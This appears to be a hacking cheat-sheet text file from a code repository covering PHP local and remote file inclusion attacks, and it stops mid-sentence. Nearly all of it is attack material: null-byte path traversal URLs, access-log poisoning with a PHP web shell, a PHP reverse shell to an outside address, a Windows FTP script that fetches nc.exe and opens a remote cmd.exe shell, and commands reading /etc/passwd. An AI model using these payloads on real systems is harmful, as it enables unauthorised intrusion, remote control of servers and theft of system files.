CryptoZSH/tools/v3das/web_file_inclusion.txt

42 lines
1.5 KiB
Plaintext
Executable File
Raw Blame History

This file contains invisible Unicode characters!

This file contains invisible Unicode characters that may be processed differently from what appears below. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to reveal hidden characters.

Local File Inclusion
====================
The %00 make php 5.3 and below ignore everything after that.
Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00
...then let's add code to the access log :)
~# nc 192.168.1.1 80
<?php echo shell_exec($_GET['cmd']);?>
...and use it
http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
...or php shell on linux:)
<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
...finally send the requests to nc and exploit:
# Windows FTP upload
echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt
nc.exe -e cmd.exe 192.168.1.1  31337
- - - - - - - -
<? system('echo open 192.168.1.1 21 > ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo bin >> ftp.txt'); ?>
<? system('echo GET nc.exe >> ftp.txt'); ?>
<? system('echo bye >> ftp.txt'); ?>
<? system('ftp -s:ftp.txt'); ?>
<? system('nc.exe -e cmd.exe 192.168.1.1  31337'); ?>
<?php phpinfo()?>
<? system("cat /etc/passwd"); ?>
<?php echo shell_exec($_GET["cmd"]);?>
<?php include="124.1.1.1" ?>
Remote file Inclusion
=====================
Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00
Note: the login.txt contains